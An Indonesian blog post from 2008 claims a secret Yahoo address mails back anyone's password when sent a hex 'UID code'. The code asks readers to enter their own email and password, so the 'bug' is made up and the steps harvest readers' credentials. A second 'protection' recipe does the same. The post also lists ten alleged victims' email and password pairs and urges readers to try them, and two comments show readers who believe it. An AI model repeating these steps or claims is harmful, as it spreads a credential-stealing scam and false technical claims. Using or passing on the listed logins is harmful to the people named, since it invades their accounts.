20 November 2008

Hacking Yahoo Password


Yahoo Mail (http://mail.yahoo.com) memiliki sistem keamanan yang cukup tangguh. Disamping itu, tampilan mailbox yang user friendly dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan penyedia layanan email berbasis web gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Yahoo!
Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna Yahoo Mail bisa sedikit berlega hati karena Yahoo telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:


1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Keempat hal diatas telah cukup untuk membuat banyak para script kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi para master).

Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus email yahoo orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs (celah keamanan) baru pada Yahoo. Yahoo memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai "uid" trenkripsi kepada alamat itu bersama alamat email orang lain, maka kamu akan memperoleh balasan email otomatis yang berisi password orang lain.

Trus gimana caranya agar kita mendapat kiriman password email orang lain? Berikut langkah-langkahnya:
Sign In dulu pada mail Yahoo. Pada alamat tujuan (To) isi dengan auto.sending@yahoo.com alamat inilah yang saya sebut sebagai alamat spesial. Kenapa? karena seharusnya alamat email ini hanya diketahui oleh administrator Yahoo saja, tapi kini alamat mematikan tersebut telah kita ketahui. Terus pada kolom Cc dan Bcc tidak kamu isi atau biarkan kosong saja. Pada kolom subject isi dengan "UID: Forgot Password" tanpa tanda petik. Setelah itu di kolom message (pesan) isi/ketik dengan kode UID berikut:
--------------------------------------------
mail.yahoo.com FALSE/FALSE 1020114252
6d 61 69 6c 6e 10 : alamat email kamu
C7 CB C3 C6 84 C9 : password kamu
6C 61 6D 65 72 69 : alamat email korban
--------------------------------------------

Tulisan yang berwarna biru ganti dengan email kamu+password, dan email korban yang dituju.
setelah itu klik Send dan tunggulah dalam waktu sekitar 2x24 jam maka kamu akan menerima email balasan yang berisi email+password orang yang kita tuju tadi beserta informasi seputar email orang tersebut seperti secret question, tanggal lahir, dsb.

Trus gimana donk kalo kita gak ingin password kita dicuri dengan cara di atas? Caranya hampir sama dengan cara mencuri password di atas, hanya saja di subject email tulis "NOUID" trus di message ketik kode UID berikut:

---------------------------------------------
mail.yahoo.com FALSE/FALSE 1020114252
63 65 77 65 63 61 78 65 70 : NOVIEWPWD
alamat email kamu ; password kamu
---------------------------------------------

Tulisan warna biru ganti dengan email dan password kamu. Ingat!! tanda diantara alamat email dan password adalah tanda titik koma (;) bukan tanda titik dua.
Setelah anda klik Send maka dipastikan email kamu akan aman dari bugs ini. Orang yang akan melakukan teknik pencurian password dengan cara itu, tidak akan pernah mendapatkan email balasan yang berisi password email kamu.

Koleksi email dan password korban yang pernah saya dapatkan:
- putra_rajab27@yahoo.co.id ; 0813463548
- tiaf_catcute@yahoo.com ; sagitarius
- riean.ajjah@yahoo.co.uk ; bethebest
- toni_ok99@yahoo.com ; 121287
- cheeseka_chan@yahoo.co.id ; 55115589
- indira.0109@yahoo.com ; nakajima
- marmalade_chick@yahoo.com ; moonchild
- torres.holic@yahoo.com ; intrancewe
- putriiy_rainbow@yahoo.com ; 87agustus
- laurielle12@yahoo.com ; 10699813

mungkin ada beberapa email di atas yang sudah tidak valid karena saya sudah dapat sejak lama dan tidak pernah saya otak-atik lagi. Atau kalo kamu pingin, silahkan login friendster dengan email dan password di atas, barangkali bisa..hehe.

+++++++++-----||------++++++++++




NB: Artikel ini akan saya hapus sewaktu-waktu tanpa ada pemberitahuan sebelumnya. Karena, dalam dunia hacking semakin sedikit yang mengetahui, maka akan semakin efektif.

2 komentar:

Anonim mengatakan...

Wedew...keren om. aq tinggal nunggu email balasan tuh...hehe

Anonim mengatakan...

wow thanks bos infonya...

Template Edited by : Ievaniesh. Thank you for using.